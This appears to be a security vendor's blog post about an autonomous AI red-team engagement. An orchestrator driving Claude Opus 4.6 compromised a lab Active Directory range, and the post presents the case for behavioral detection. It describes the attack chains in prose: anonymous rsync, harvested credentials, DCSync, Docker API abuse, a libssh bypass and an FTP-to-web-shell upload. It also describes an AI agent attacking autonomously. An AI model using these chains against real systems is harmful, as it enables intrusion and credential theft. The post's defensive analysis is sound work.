The adversary who never gets tired: what a 6-hour AI red-team engagement means for your SOC

Praise Olukilede

April 23, 2026

DeepTempo builds LogLM, a behavioral foundation model for network and log telemetry that sees attacks rules miss. Vigil, our open-source AI-native SOC, turns LogLM detections into investigations and response. This post covers a recent ARTEMIS red-team run, driven by Claude Opus 4.6 through OpenRouter, with no human at the keyboard, and what it changes about how defenders should think about detection.

The asymmetry has shifted

Every security program in production today was designed against an attacker with finite attention. A human adversary has to choose: which host to enumerate, which credential to try, which exploit to prioritize, when to stop. That budget is the defender's best friend. It creates gaps in the attacker's coverage (paths they didn't have time to test) and the whole game of defense in depth relies on those gaps being there.

On April 9, 2026, we pointed ARTEMIS, an open-source red-team orchestration framework, at a hosted cyber range called STARBARS (a Star Wars–themed Active Directory forest with a domain controller named DEATHSTAR). The orchestrator drove Claude Opus 4.6 through OpenRouter. Six-hour session window. No human operator.

In that window ARTEMIS identified 10 live hosts, spawned 55 agent instances across recon, triage, reproduction, and severity phases, produced 13 confirmed findings (8 Critical, 3 High, 2 Medium), rooted two hosts, compromised the domain, and recovered the plaintext Domain Administrator password: iamy0urf4ther, because the range designers have a sense of humor. It found four independent paths to domain compromise and built all four in parallel, even though any single one would have been enough.

A competent human pentester working this range solo would typically take two to five days to produce a comparable findings list. ARTEMIS did it in six hours. For context on cost: the OpenRouter API bill for the session was on the order of tens of dollars.

The strategic point for CISOs and VPs of Security isn't that AI can do red-teaming. That question is settled. The point is that the economic model your detection stack was built against has quietly inverted. The attacker now has infinite attention, and your defenders still have a queue and a shift.

Four chains, built in parallel

ARTEMIS didn't find one way in. It found four, concurrently.

rsync → Domain Admin on corellian
Docker API → host root on tython
libssh auth bypass → root on tython
FTP upload → PHP web shell on ashla

Chain 1, rsync to Domain Admin. Anonymous rsync on host corellian (port 873) exposed the filesystem. Cleartext credentials committed to a Gitea repository authenticated to Active Directory. DCSync against the DEATHSTAR domain controller returned the full NTDS, including, because DOMAIN_PASSWORD_STORE_CLEARTEXT was enabled, the Domain Administrator password as readable text.

Chain 2, Docker API to host root. Unauthenticated Docker API on host tython (port 2375) accepted container creation requests with no credentials. A privileged container mounting the host filesystem delivered host root in one API call.

Chain 3, libssh authentication bypass to root. tython also exposed libssh 0.8.1 on port 1337, vulnerable to CVE-2018-10933. Direct uid=0(root) via an authentication bypass that's been public since 2018.

Chain 4, FTP upload to PHP web shell. Host ashla allowed anonymous FTP writes to an /upload/ directory, and the co-located Apache server executed PHP from that same path. Anonymous upload, web shell, www-data RCE.

The credential-reuse layer (iamy0urf4ther recovered from the Gitea repo, confirmed via DCSync, then successfully reused against Portainer, Gitea, and MariaDB) is what turned four separate host compromises into one unified domain-wide outcome. This is the pattern in every real incident we analyze: the initial access is loud and fixable; the lateral movement through reused credentials is what actually burns down the environment.

Two observations before we go deeper.

First, none of this is novel attacker craft. Every finding is something a trained human would identify. Unauthenticated Docker API on 2375, libssh 0.8.1, anonymous rsync, FTP with a writable upload plus PHP execution: these are range-grade vulnerabilities on OSCP study guides. What's different is the assembly: a language model walked the full kill chain, maintained state across hundreds of iterations, triaged its own findings, and classified severity without being told which path to take.

Second, the agent built redundancy for its own sake. ARTEMIS already had root on tython via libssh at 18:13. It built the Docker API path anyway, over an hour later. A human with shell stops. An agent with no ego and no fatigue treats redundancy as a first-class goal. If one path gets patched mid-engagement, the other stays open.

The rsync-to-DA chain: the 52-minute window

Let's zoom into the chain that produced Domain Admin.

18:17 UTC, ARTEMIS connects to corellian:873 with no credentials and pulls the filesystem. Rsync without authentication was a deliberate vulnerability on the range, but the same misconfiguration appears in production networks constantly as a backup target or a developer convenience that never got locked down.

18:18–18:19, anonymous module listing succeeds. Full filesystem enumeration of /root and /etc begins.

18:22–18:32, in parallel with the rsync walk, a separate agent thread starts grepping port 3000 (Gitea) for secrets. This is a key detail: ARTEMIS is not running one attack. It's running several, and it does not care which one wins.

18:32, SSH master keys exfiltrated from /root over rsync. Four seconds of traffic. An Ed25519 starbars-master-key with no passphrase, granting environment-wide SSH access. The agent files it and keeps going; it's already found something better.

18:42, Gitea credential harvest. Somewhere in a config repo, someone committed the Domain Admin password in plaintext. ARTEMIS extracts it and adds it to the credential pool. The credential wasn't brute-forced or cracked. It was read.

19:09, DCSync. ARTEMIS issues an MS-DRSR DRSGetNCChanges call against DEATHSTAR using the harvested credential. This is the same protocol real DCs use to replicate with each other. The request completes successfully in 54 seconds. The response contains the NTDS: every NTLM hash in the domain, every service account, the krbtgt hash (meaning golden-ticket forgery capability that persists until someone rotates that password twice).

Fifty-two minutes from the first unauthenticated rsync packet to full replication of the domain credential store. Not because the techniques were exotic. Every step has a low signature in isolation:

The rsync pull is a single TCP session to port 873 that completes normally. Nothing malformed, no signature hits.
Reading a Gitea repository config is indistinguishable from a developer cloning work.
The DCSync request is a legitimate MS-DRSR call. Every domain controller services these constantly.

Each step, viewed alone, is normal. The attack is the sequence, not any single action.

The AI tells: what you're actually looking at on the wire

This is the part that matters for detection strategy, because it changes what you're looking for. A human attacker's signal on the wire looks like sequential, throttled, hypothesis-driven testing. An AI agent's signal can look fundamentally different, and every one of these signatures showed up in the STARBARS capture.

17:41, the premature lunge. Before mapping the network, the agent took a speculative swing at 10.100.100.105 on ports 389, 636, and 88: the classic domain controller fingerprint. It was wrong. It didn't yet know which host was the DC. It was pattern-matching on "enterprise subnet" and trying the highest-value target first. Five minutes later it abandoned the attempt and restarted with proper discovery.

17:42, the flood. Seventeen seconds of ICMP sweep, then at 17:42:19, the same second the ping sweep completed, a full TCP SYN scan covering ports 1–10000 launched against every live host. Simultaneously. No pause, no throttling, no attempt to blend in. This one scan accounts for roughly 112,000 netflow records, about 80% of the entire capture. A human operator slow-scans, uses decoys, spreads activity over hours. ARTEMIS optimizes for time-to-objective. Stealth isn't weighted in the objective function, so stealth doesn't happen.

17:57, four enumerations, simultaneously. With the service map back, the agent picked four targets at once: FTP probe against ashla, NFS/RPC/SMB sweep against BOGAN, rsync enumeration against corellian, and the libssh version check against tython. Parallel threads, findings correlated as they came in, each result fed back into the planning context. A human does one of these at a time.

18:38, diverse hypothesis password spray. Three SMB password sprays against DEATHSTAR in three minutes: iamy0urf4ther (cultural reference, fits the naming theme), Password1 (statistical baseline from common wordlists), deathstar!RULES1 (context-derived from hostnames). All three failed. What's interesting is the diversity. A human tends to cargo-cult a single wordlist. The agent generated three categorically different hypotheses and tried them sequentially.

19:13 onward, the redundant root paths. Having already rooted tython via libssh at 18:13, ARTEMIS spent the next hour building two more paths to root on the same host: Portainer credential spray (hit at 19:30 with the reused DA password), then raw Docker API at 19:59 (privileged container, host filesystem mount, host root in one POST). A human stops at shell. The agent's planner treats "at least two paths to every objective" as a first-class goal.

20:16–23:38, the long tail. By 20:00 the mission was functionally complete: domain compromised, two hosts rooted, persistence established. A human writes up the report and logs off. ARTEMIS spent the next three and a half hours doing sustained WordPress enumeration, two full network rescans, a methodical sweep of the .2–.127 range in four 32-host chunks, probes against Wing FTP and TightVNC on hosts that had never been part of any kill chain. If the session window had been twelve hours instead of six, it would have kept going. The planner has no concept of "good enough."

Each of these behaviors is benign considered in isolation. Collectively, they form a fingerprint: the fingerprint of an operator with no attention cost, no time pressure, and no stop condition.

The skeptic's question: can't our existing tools catch this?

This is the objection we hear most. It deserves a serious answer. Let's walk through what a traditional stack sees during the 52-minute rsync-to-DA window.

A signature-based IDS: nothing, until the DCSync triggers a Mimikatz-family rule, if the organization has that rule tuned, if the tool ARTEMIS uses is recognized. ARTEMIS composes its own command sequences; Mimikatz-specific signatures miss more often than they hit.

A SIEM with correlation rules: a handful of low-severity events (successful rsync connection, successful authentication, replication request) that individually sit below the alerting threshold. Correlation rules fire on pre-authored patterns like "five failed logins followed by a success." This attack had no failures. Every authentication worked the first time because the credentials were valid.

An EDR on the endpoints: the Linux hosts showed normal service behavior. The DC showed a legitimate replication request from an authorized account. EDR fires if Mimikatz.exe is dropped on disk. It wasn't.

This is the market's central detection problem, and it's been there for a decade: rule-based detection is pattern-matching against known-bad. It misses anything that looks like normal operation from the perspective of the individual signal. What's new is that an AI-driven attacker exploits that gap at an economic cost of pennies per API call.

What LogLM sees that rules miss

LogLM is a behavioral foundation model for network and log telemetry, an encoder-only transformer that learns the joint behavior of services, identities, and endpoints across an environment. Instead of matching individual events against a library of known-bad patterns, LogLM builds a pattern of life for each entity and scores sequences of activity against that learned behavior.

The detection advantage isn't magic. It's a different primitive: instead of asking "does this event match a known-bad signature," LogLM asks "does this sequence of behavior fit the established pattern of life for these entities."

The specific things LogLM would surface on an engagement like this, mapped to flows from the STARBARS capture:

The 112,000-flow scan from a new source. Not because of the volume alone; plenty of legitimate services generate high flow counts. But the peer set is wrong. 192.168.20.2 has no prior relationship with any 10.100.100.x host in the environment's behavioral history, and suddenly it's establishing sessions with ten of them across thousands of ports inside a thirteen-minute window. The behavioral departure is the fingerprint, not the raw count.

The rsync extraction. corellian normally serves some megabytes of code across a handful of sessions to known developer workstations. Suddenly it's transferring the entire filesystem, including /root and /etc, to an address that has no prior relationship with it. The individual connection looks clean; the shift in the host's behavioral pattern is what LogLM encodes.

The identity pivot. The credential harvested from Gitea authenticates to the DC from 192.168.20.2, a host inside the attack-jumpbox segment. That identity, in its learned pattern of life, authenticates from workstation subnets to file shares, not from jumpbox segments to domain controllers. Each authentication is valid. The pattern of which identities authenticate from which segments to which targets is part of what LogLM has learned.

The DCSync itself. Domain controllers service replication requests constantly, but the source hosts for those requests form a tight behavioral pattern: almost always other DCs, occasionally specific replication appliances. A DCSync from 10.100.100.201, a host that has never previously sourced MS-DRSR replication traffic, breaks that pattern, even when the protocol exchange is perfectly well-formed.

The credential-reuse fan-out. Within 90 minutes of the initial rsync, the same credential authenticated against Portainer, Gitea, and MariaDB. Each login succeeded. A rule-based stack sees three valid logins across three services. LogLM sees a temporal cluster of first-time authentications from new source-identity-target combinations: the behavioral signature of credential reuse after compromise.

The long-tail scanning. The .2–.127 sweep ARTEMIS ran between 22:35 and 23:38, long after the mission was complete, is the behavioral signature of an agent-driven operator that doesn't know how to stop. A rule-based stack scored those scans as duplicates of the 17:42 event (same source, same behavior, no new alert). LogLM scores them as an unusually persistent reconnaissance pattern continuing hours after the objective was achieved, which is itself a strong anomaly.

None of these detections require signature updates. None require knowing what ARTEMIS is or what Mimikatz looks like. They fall out of modeling behavior as a pattern of life and flagging departures from it.

The Vigil layer: detection without response is half a capability

LogLM's behavioral scores and embeddings feed Vigil, our open-source AI-native SOC. Vigil is 13 agents, 30+ MCP integrations, and 7,200+ detection rules, released under Apache 2.0 at RSA 2026.

On an engagement like the STARBARS run, Vigil's agents would take the LogLM alert on the rsync-to-DCSync sequence and, within the same automated investigation: enrich with Okta/AD identity context, pull the full session reconstruction from the data lake, check for related alerts across the environment, open a case, propose containment actions for analyst review, and draft the incident writeup. The human stays in the loop for decisions; the mechanical work is agent-driven.

The open-source release matters for reasons that connect directly to the ARTEMIS story. If adversaries have access to agentic red-team orchestration running on frontier models (and they do; OpenRouter charges pennies per API call), then defenders need equivalent agentic capability on their side of the line. The asymmetry we described at the top of this post only closes if both sides are playing the same game. A closed, expensive, proprietary AI SOC doesn't rebalance the economics. An open one does.

What this means for your security program

Three concrete implications for anyone running a security program today:

Your threat model should assume AI-driven reconnaissance and exploitation at scale, not as a future risk. The tools are open-source. The underlying models are getting better every quarter. ARTEMIS running on Opus 4.6 in April 2026 does what took a mid-tier human team a week eighteen months ago; whatever runs on the next model will be more capable, faster, and cheaper. The planning-cycle question is not "when will this arrive," it's "what changes do we need to make before it's someone else's incident."

Rule-based detection is a floor, not a ceiling. Every finding in the STARBARS report is catchable with rules if you have the right rule for the right version of the right tool configured on the right host. Nobody does. The real coverage question is what happens when the adversary does something your rules weren't written for, and in an engagement where the adversary tries all the adjacent attacks in parallel, the answer to that question stops being theoretical. Behavioral models close the gap between "catches what you anticipated" and "catches what you didn't."

Credential hygiene is still the single highest-leverage control. The range used a joke password, but the pattern (one credential reused across domain, developer tooling, and infrastructure admin interfaces) is the pattern in every real breach we analyze. If STARBARS had used distinct credentials per system with a vault, the four attack chains would have produced four isolated compromises instead of one unified domain takeover. That's a configuration change, not a purchase.

Closing: the attacker has no queue

The strategic takeaway isn't that an AI agent found eight criticals on a Stanford cyber range. It's that the economic model your SOC was built against has inverted. Defenders still have a queue: alerts stacked in a backlog, analysts working a shift, budget that forces prioritization. The attacker no longer has one. An agent framework with API access runs every attack in parallel, against every host, until the session window closes or the objective is met, and then keeps running because the objective function doesn't have a stop clause.

The STARBARS defenders weren't outsmarted. They were outscaled. Every individual misconfiguration on that network had been a misconfiguration for years. A human attacker would have found two or three of them. ARTEMIS found all of them, built redundant exploitation paths to each, and then spent three more hours looking for a fourteenth thing.

The question defenders now have to answer isn't "do we have any gaps?" It's "do we have zero gaps?", because the attacker can check all of them in an afternoon, at API-call cost, while everyone on the defense side is asleep.

That's the world we built LogLM and Vigil for. Both are designed for the engagement ARTEMIS previewed on April 9, not the engagement rule-based stacks were built for.

The ARTEMIS framework and STARBARS range are open and reproducible. Netflow data from this engagement is available with phase-level labels for training intrusion detection models. Reach out if you want to run a similar engagement or discuss detection strategy for AI-driven adversaries.

‍

Table of contents

Sample H2

Sample H3